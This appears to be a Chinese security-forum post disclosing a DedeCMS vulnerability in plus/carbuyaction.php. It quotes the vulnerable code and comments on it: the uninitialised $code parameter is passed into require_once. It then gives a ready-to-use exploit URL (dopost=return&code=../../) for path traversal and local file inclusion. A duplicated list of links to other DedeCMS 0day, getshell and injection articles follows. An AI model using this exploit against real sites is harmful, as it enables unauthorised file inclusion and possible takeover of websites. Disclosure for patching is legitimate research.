By:俺是农村的
漏洞文件:plus/carbuyaction.php
<?php
require_once (dirname(__FILE__) . "/../include/common.inc.php");
define('_PLUS_TPL_', DEDEROOT.'/templets/plus');
require_once DEDEINC.'/dedetemplate.class.php';
require_once DEDEINC.'/shopcar.class.php';
require_once DEDEINC.'/memberlogin.class.php';
if($cfg_mb_open=='N')
{
ShowMsg("系统关闭了会员功能,因此你无法访问此页面!","javascript:;");
exit();
}
$cfg_ml = new MemberLogin();
if(!isset($dopost) || empty($dopost)){ //只要$dopost不为空就行,By:俺是农村的。
...
}elseif($dopost == 'return'){
require_once DEDEINC.'/payment/'.$code.'.php'; //变量$code未初始化,By:俺是农村的。
$pay = new $code;
$msg=$pay->respond();
ShowMsg($msg,"javascript:;",0,3000);
exit();
}
?>
http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../
只显示10条记录相关文章
DeDecms xss 通杀0day 附getshell EXP (浏览: 27865, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35448, 评论: 0)
dedecms默认的注册用户 (浏览: 12972, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13764, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16393, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37601, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22243, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 11174, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 10281, 评论: 0)
DedeCms V5.6 注入 0day (浏览: 10751, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35448, 评论: 0)
dedecms默认的注册用户 (浏览: 12972, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13764, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16393, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37601, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22243, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 11174, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 10281, 评论: 0)
DedeCms V5.6 注入 0day (浏览: 10751, 评论: 0)
Trackbacks
 |
 |
 |
